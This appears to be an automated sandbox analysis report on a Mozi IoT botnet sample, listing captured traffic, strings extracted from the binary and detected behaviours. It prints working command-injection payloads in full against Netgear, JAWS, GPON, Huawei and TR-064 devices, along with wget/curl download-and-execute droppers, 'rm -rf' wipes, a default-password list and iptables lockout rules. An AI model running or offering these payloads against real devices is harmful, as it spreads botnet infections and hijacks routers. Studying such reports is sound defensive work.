Source: unknown TCP traffic detected without corresponding DNS query: 78.138.19.157
Source: unknown TCP traffic detected without corresponding DNS query: 211.98.218.197
Source: unknown TCP traffic detected without corresponding DNS query: 126.165.20.233
Source: unknown TCP traffic detected without corresponding DNS query: 4.121.119.146
Source: unknown TCP traffic detected without corresponding DNS query: 7.242.90.54
Source: unknown TCP traffic detected without corresponding DNS query: 203.113.226.208
Source: unknown TCP traffic detected without corresponding DNS query: 156.188.202.182
Source: unknown TCP traffic detected without corresponding DNS query: 69.219.15.151
Source: unknown TCP traffic detected without corresponding DNS query: 84.49.106.247
Source: unknown TCP traffic detected without corresponding DNS query: 126.111.174.160
Source: unknown TCP traffic detected without corresponding DNS query: 88.107.197.218
Source: unknown TCP traffic detected without corresponding DNS query: 137.96.65.50
Source: unknown TCP traffic detected without corresponding DNS query: 57.57.176.173
Source: unknown TCP traffic detected without corresponding DNS query: 11.51.35.100
Source: unknown TCP traffic detected without corresponding DNS query: 94.151.112.236
Source: unknown TCP traffic detected without corresponding DNS query: 120.12.34.156
Source: unknown TCP traffic detected without corresponding DNS query: 99.64.63.156
Source: unknown TCP traffic detected without corresponding DNS query: 162.238.7.116
Source: unknown TCP traffic detected without corresponding DNS query: 92.54.230.127
Source: unknown TCP traffic detected without corresponding DNS query: 84.40.114.1
Source: unknown TCP traffic detected without corresponding DNS query: 82.129.200.140
Source: unknown TCP traffic detected without corresponding DNS query: 125.111.112.230
Source: unknown TCP traffic detected without corresponding DNS query: 70.220.45.231
Source: unknown TCP traffic detected without corresponding DNS query: 198.118.3.130
Source: unknown TCP traffic detected without corresponding DNS query: 200.237.209.54
Source: unknown TCP traffic detected without corresponding DNS query: 108.89.104.186
Source: unknown TCP traffic detected without corresponding DNS query: 81.197.119.173
Source: unknown TCP traffic detected without corresponding DNS query: 133.239.82.116
Source: unknown TCP traffic detected without corresponding DNS query: 218.241.194.24
Source: unknown TCP traffic detected without corresponding DNS query: 98.157.141.146
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sat, 06 Feb 2021 10:39:02 GMTContent-Length: 205Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e 4f ea f4 ee 51 f2 78 72 f4 2c 6b b3 32 cd eb ba aa 1f df 9d 1c 3d 4a d3 37 f3 a2 49 cf 8b 32 4f e7 59 93 e6 ef 56 45 9d cf c6 69 b1 4c a9 f9 d3 47 bf ef ec fe c1 55 3e f9 7d b3 d5 ea f7 2d 96 d3 06 ff 8c 57 f3 15 de 4e ab 65 5a 16 cb 1c 2d 77 f0 81 f6 f3 ff 00 a6 dc 9b 26 6f 00 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"OQxr,k2=J7I2OYVEiLGU>}-WNeZ-w&o
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 175.203.81.2:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.217.12.208:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 47.246.22.230:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.140.205.214:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 24.239.192.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.89.231.175:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 193.248.153.76:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 74.79.213.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.236.242.26:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.12.191.118:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 180.254.107.55:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 06 Feb 2021 10:36:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;$
Source: mozi.a.zip String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: mozi.a.zip String found in binary or memory: http://%s:%d/bin.sh
Source: mozi.a.zip String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: mozi.a.zip String found in binary or memory: http://127.0.0.1
Source: mozi.a.zip String found in binary or memory: http://127.0.0.1sendcmd
Source: mozi.a.zip String found in binary or memory: http://HTTP/1.1
Source: mozi.a.zip String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: mozi.a.zip String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: mozi.a.zip String found in binary or memory: http://purenetworks.com/HNAP1/
Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: mozi.a.zip String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/mozi.a.zip (PID: 4598) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: mozi.a.zip, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.linZIP@0/221@4/0

Persistence and Installation Behavior:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4670) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4674) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT Jump to behavior
